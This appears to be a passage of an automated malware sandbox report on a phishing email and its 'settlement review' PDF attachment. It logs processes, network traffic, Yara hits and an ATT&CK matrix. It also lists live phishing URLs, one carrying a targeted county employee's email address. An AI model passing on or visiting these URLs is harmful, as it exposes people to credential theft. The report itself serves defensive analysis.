              Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49969 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49994 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50020 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49856 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49913 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50006 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
              Source: unknownNetwork traffic detected: HTTP traffic on port 49865 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49942
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49941
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49940
              Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50052 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49939
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49938
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
              Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49937
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49936
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49935
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
              Source: unknownNetwork traffic detected: HTTP traffic on port 49902 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49934
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49933
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49932
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49931
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49930
              Source: unknownNetwork traffic detected: HTTP traffic on port 49925 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50008 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49971 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
              Source: unknownHTTPS traffic detected: 52.72.49.79:443 -> 192.168.2.17:49834 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 52.72.49.79:443 -> 192.168.2.17:49835 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 52.72.49.79:443 -> 192.168.2.17:49838 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.65.73:443 -> 192.168.2.17:49848 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 151.101.2.137:443 -> 192.168.2.17:49865 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 35.190.80.1:443 -> 192.168.2.17:49892 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 142.251.40.164:443 -> 192.168.2.17:49899 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 13.107.246.38:443 -> 192.168.2.17:49912 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 13.107.246.38:443 -> 192.168.2.17:49914 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.149.248:443 -> 192.168.2.17:49974 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.149.248:443 -> 192.168.2.17:49990 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.189.39:443 -> 192.168.2.17:50000 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.17.25.14:443 -> 192.168.2.17:50003 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 140.82.114.4:443 -> 192.168.2.17:50015 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 18.164.124.110:443 -> 192.168.2.17:50017 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 18.164.124.110:443 -> 192.168.2.17:50016 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 18.164.124.110:443 -> 192.168.2.17:50018 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.17:50019 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 18.164.124.11:443 -> 192.168.2.17:50020 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.26.1.100:443 -> 192.168.2.17:50041 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.26.1.100:443 -> 192.168.2.17:50048 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.159.28:443 -> 192.168.2.17:50049 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.159.28:443 -> 192.168.2.17:50052 version: TLS 1.2
              Source: classification engineClassification label: mal100.phis.evad.winMSG@37/69@34/94
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Program Files\Google\Chrome\Application\Dictionaries
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEFile created: C:\Users\user\Documents\Outlook Files\~Outlook Data File - NoEmail.pst.tmp
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEFile created: C:\Users\user\AppData\Local\Temp\Outlook Logging\OUTLOOK_16_0_16827_20130-20250325T0903040401-6724.etl
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEFile read: C:\Users\desktop.ini
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
              Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" /f "C:\Users\user\Desktop\suspectTelling clean needful (78.2 KB).msg"
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe "C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe" "5D9480B7-87DB-494E-8158-DCEF20A42F2E" "5A3E5134-C139-472A-844E-4DB1D81FEFFD" "6724" "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" "WordCombinedFloatieLreOnline.onnx"
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe "C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe" "5D9480B7-87DB-494E-8158-DCEF20A42F2E" "5A3E5134-C139-472A-844E-4DB1D81FEFFD" "6724" "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" "WordCombinedFloatieLreOnline.onnx"
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\VHZABR72\Hillsboroughcounty_Settlement_Review_Signature_Required.pdf"
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2132 --field-trial-handle=1576,i,2438255174600279274,1045567102742367200,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
              Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://birdeye.cx/ionvrg#Upinedao@hillsboroughcounty.org
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1976,i,8765833600481130617,6448814853754352925,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2016 /prefetch:3
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\VHZABR72\Hillsboroughcounty_Settlement_Review_Signature_Required.pdf"
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: unknown unknown
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2132 --field-trial-handle=1576,i,2438255174600279274,1045567102742367200,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1976,i,8765833600481130617,6448814853754352925,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2016 /prefetch:3
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: apphelp.dll
              Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: c2r64.dll
              Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: userenv.dll
              Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: msasn1.dll
              Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: kernel.appcore.dll
              Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: cryptsp.dll
              Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: rsaenh.dll
              Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: cryptbase.dll
              Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: gpapi.dll
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{F959DBBB-3867-41F2-8E5F-3B8BEFAA81B3}\InprocServer32
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEWindow found: window name: SysTabControl32
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\Common
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\Google\Chrome\Application\Dictionaries
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Immersive\production\Token\{2B379600-B42B-4FE9-A59C-A312FB934935} DeviceTicket
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              barindex
              Source: Yara matchFile source: 0.1.d.script.csv, type: HTML
              Source: Yara matchFile source: 1.11..script.csv, type: HTML
              Source: Yara matchFile source: 1.12..script.csv, type: HTML
              Source: Yara matchFile source: 1.3.pages.csv, type: HTML
              Source: Yara matchFile source: 1.4.pages.csv, type: HTML
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information queried: ProcessInformation
              Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeQueries volume information: C:\Program Files (x86)\Microsoft Office\root\Office16\AI\WordCombinedFloatieLreOnline.onnx VolumeInformation
              Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity Information1
              Scripting
              Valid AccountsWindows Management Instrumentation31
              Browser Extensions
              1
              Process Injection
              3
              Masquerading
              OS Credential Dumping1
              Process Discovery
              Remote ServicesData from Local System1
              Encrypted Channel
              Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault AccountsScheduled Task/Job1
              Scripting
              1
              DLL Side-Loading
              1
              Modify Registry
              LSASS Memory1
              File and Directory Discovery
              Remote Desktop ProtocolData from Removable Media3
              Ingress Tool Transfer
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAt1
              DLL Side-Loading
              1
              Extra Window Memory Injection
              1
              Process Injection
              Security Account Manager13
              System Information Discovery
              SMB/Windows Admin SharesData from Network Shared Drive4
              Non-Application Layer Protocol
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
              Deobfuscate/Decode Files or Information
              NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture5
              Application Layer Protocol
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              DLL Side-Loading
              LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              Extra Window Memory Injection
              Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              https://birdeye.cx/ionvrg0%Avira URL Cloudsafe
              https://oazh.jyqhucdd.es/Yx6Is/0%Avira URL Cloudsafe
              https://oazh.jyqhucdd.es/favicon.ico0%Avira URL Cloudsafe
